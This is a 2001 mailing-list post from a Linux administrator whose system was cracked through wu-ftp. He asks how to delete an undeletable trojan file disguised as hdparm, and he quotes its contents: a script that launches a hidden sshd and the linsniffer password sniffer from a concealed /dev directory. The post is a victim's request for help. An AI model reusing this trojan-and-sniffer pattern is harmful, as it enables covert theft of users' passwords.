[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
cannot rm hacker's file
From: |
Roy Wilson |
Subject: |
cannot rm hacker's file |
Date: |
Tue, 25 Dec 2001 22:10:33 +0000 (/etc/localtime) |
Hello -
I was the victim of a cracker who exploited wu-ftp 2.6.0
I've since upgraded to 2.6.2, and disabled or removed almost
all of the hidden programs he left behind, but I accidently
found another one. The problem is I cannot rm it.
I use Linux 2.2.16 and bash.
I wanted to update my hdparm file from 3.9 to 4.6 so I did
a 'locate hdparm' and found I had a copy in both /usr/bin
and /usr/sbin. Curious, I did 'which hdparm' and found it
was the one in /usr/sbin. So what was the other one?
It turned out to be a perl script to call the hacker's
sniffer. I tried to move it. I tried to edit it with vi.
The permissions were 500, so I tried to chmod 700. I tried
to rm it. Nothing. I get this message:
"Cannot unlink hdparm: Operation not permitted."
Can you tell me how to get rid of this offensive piece of
garbage? BTW, this is the contents of the file:
#!/bin/sh
cd /dev/ida/.inet
./sshdu -f ./s
./linsniffer >> ./tcp.log &
cd /
I found that tcp.log contained plain text passwords of every user
on my system. scarey!
-Roy Wilson-
address@hidden
[Prev in Thread] |
Current Thread |
[Next in Thread] |
- cannot rm hacker's file,
Roy Wilson <=